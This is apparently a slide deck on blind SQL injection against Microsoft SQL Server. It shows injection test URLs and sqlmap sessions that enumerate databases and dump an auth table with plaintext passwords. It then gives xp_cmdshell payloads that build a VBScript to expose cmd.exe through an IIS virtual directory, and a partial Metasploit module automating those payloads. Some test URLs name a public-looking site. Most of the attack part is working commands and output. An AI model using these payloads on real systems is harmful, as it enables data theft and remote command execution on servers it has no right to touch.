1. Blind SQL Injection

2. Blind SQL Injection
• We have SQL injection point but it is not throwing any error message out
as part of its response. Application is sending customized error page
which is not revealing any signature by which we can deduce potential
SQL flaw.
• Knowing SQL injection point or loophole in web application, xp_cmdshell
seems to be working. But we can’t say is it working or not since it doesn’t
return any meaningful signature. This is “blind xp_cmdshell”.
• Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from
the box to the Internet by which you can confirm execution of the
command on the target system.
• We don’t know the actual path to webroot so can’t copy file to location
which can be accessed over HTTP or HTTPS later to confirm the execution
of the command.
• If we know path to webroot and directory structure but can’t find execute
permission on it so can’t copy cmd.exe or any other binary and execute
over HTTP/HTTPS.

3. Checks…
• AND 1=1
• DBO check
http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo'
• Wait delay call
http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10'
• (SELECT+ASCII(SUBSTRING((a.loginame),1,1))
+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
• http://www.dvds4less.net/details.aspx?id=1+AND+
(SELECT+ASCII(SUBSTRING((a.loginame),1,1))
+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114
• http://www.dvds4less.net/details.aspx?id=1+AND+
(SELECT+ASCII(SUBSTRING((a.loginame),2,1))
+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97

4. Running tools
• SQL Map or Absinthe
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:47:58
[18:48:00] [WARNING] the remote DMBS is not MySQL
[18:48:00] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
[*] shutting down at: 18:48:14

5. Enumeration…
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:53:10
[18:53:12] [WARNING] the remote DMBS is not MySQL
[18:53:12] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
available databases [9]:
[*] CmdExec_example
[*] Dashboard
[*] catalog
[*] demotrading
[*] master
[*] model
[*] msdb
[*] order
[*] tempdb
[*] shutting down at: 18:55:07

6. Enumeration…
D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D
catalog
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:59:21
[18:59:22] [WARNING] the remote DMBS is not MySQL
[18:59:22] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
[3 tables]
+--------------+
| auth |
| dtproperties |
| items |
+--------------+

7. Enumeration…
D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D ca
talog -T auth
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 19:01:27
[19:01:28] [WARNING] the remote DMBS is not MySQL
[19:01:28] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
Table: auth
[3 entries]
+--------+------+---------+
| access | user | pass |
+--------+------+---------+
| 101010 | dbo | john123 |
| 110011 | | great |
| 001011 | | loveit |
+--------+------+---------+

8. Exploiting
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
windir = ObjExec.StdOut.ReadLine()
Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
Set Dir = Root.Create("IIsWebVirtualDir", "secret")
Dir.Path = windir
Dir.AccessExecute = True
Dir.SetInfo
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell =
WScript.CreateObject("WScript.Shell") > c:secret.vbs’
…..
…..
…..
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo
>> c:secret.vbs’
http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’

9. Get the cmd.exe
• Run command over HTTP/HTTPS
• http://target/secret/system32/cmd.exe?+/c+set

10. Metasploit …
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $path = $self->GetVar('RPATH');
my $vhost = $self->GetVar('VHOST');
my @url = split(/#/, $path);
my @payload =
("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'",
"EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'"
);
$self->PrintLine("[+] Sending SQL injection payload...");
for(my $count=0;$count<=6;$count++)
..

11. Metasploit…

12. Conclusion